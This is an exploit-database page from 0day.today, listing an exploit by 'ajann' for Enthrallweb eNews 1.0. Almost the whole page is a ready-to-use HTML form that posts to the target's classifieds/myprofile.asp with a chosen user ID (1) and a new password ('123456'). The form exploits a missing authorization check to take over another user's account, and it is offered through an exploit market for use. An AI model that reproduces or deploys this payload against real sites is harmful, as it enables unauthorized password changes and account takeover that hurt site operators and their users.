[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Enthrallweb eNews 1.0 Remote User Pass Change Exploit

Author
ajann
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1304
Category
web applications
Date add
23-12-2006
Platform
unsorted
=====================================================
Enthrallweb eNews 1.0 Remote User Pass Change Exploit
=====================================================



<form action="[target]/classifieds/myprofile.asp" method="POST" name="form2">
User Id: <input type="text" name="MM_recordId" value="1">
                          <p>&nbps;</p>
                          <table align="center" cellpadding="1" cellspacing="1">
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">PASSWORD:</font></strong></td>
                              <td> <input type="text" name="U_PASSWORD" value="123456" size="35" maxlength="10" class="inputFieldIE"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">FIRST:</font></strong></td>

                              <td> <input type="text" name="U_FIRST" value="Joe" size="35" class="inputFieldIE"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">LAST:</font></strong></td>
                              <td> <input type="text" name="U_LAST" value="Blow" size="35" class="inputFieldIE"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">ADDRESS:</font></strong></td>

                              <td> <input type="text" name="U_ADDRESS" value="Somewhere Avenue" class="inputFieldIE" size="35"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">CITY/TOWN:</font></strong></td>
                              <td> <input type="text" name="U_CITY" value="Some Town" size="35" class="inputFieldIE"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">STATE/PROVINCE:</font></strong></td>

                              <td> <input type="text" name="U_STATE" value="Iowa" size="35" class="inputFieldIE"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">ZIP/POSTAL:</font></strong></td>
                              <td> <input type="text" name="U_ZIP" value="50266" size="35" class="inputFieldIE"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">EMAIL:</font></strong></td>

                              <td> <input type="text" name="U_EMAIL" value="joe@joe.com" size="35" class="inputFieldIE"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">PHONE:</font></strong></td>
                              <td> <input type="text" name="U_PHONE" value="555-555-5555" size="35" maxlength="15" class="inputFieldIE"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">FAX:</font></strong></td>

                              <td> <font size="1"> <i> <font face="Verdana, Arial, Helvetica, sans-serif"> 
                                </font><font size="1"><i><font face="Verdana, Arial, Helvetica, sans-serif"> 
                                <input type="text" name="U_FAX" value="" size="35" maxlength="15" class="inputFieldIE">
                                </font></i></font><font face="Verdana, Arial, Helvetica, sans-serif">(Optional)</font></i></font> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">RECEIVE 
                                NEWS</font></strong></td>

                              <td> <input  name="subscribe" type="checkbox" id="subscribe" value="checkbox"> 
                                <span class="content"> (LEAVE EMPTY TO UNSUBSCIBE)</span></td>
                            </tr>
                            <tr valign="baseline"> 
                              <td height="44" align="right" nowrap><font color="#333333">&nbps;</font></td>
                              <td> <input  name="submit" type="submit" class="Buttons" onClick="MM_validateForm('U_FIRST','','R','U_LAST','','R','U_ADDRESS','','R','U_CITY','','R','U_STATE','','R','U_ZIP','','R','U_EMAIL','','RisEmail','U_PHONE','','R','U_PASSWORD','','R');return document.MM_returnValue" value="Update"> 
                              </td>
                            </tr>

                          </table>
                          <input type="hidden" name="MM_update" value="form2">
                          
                        </form>



#  0day.today [2024-12-24]  #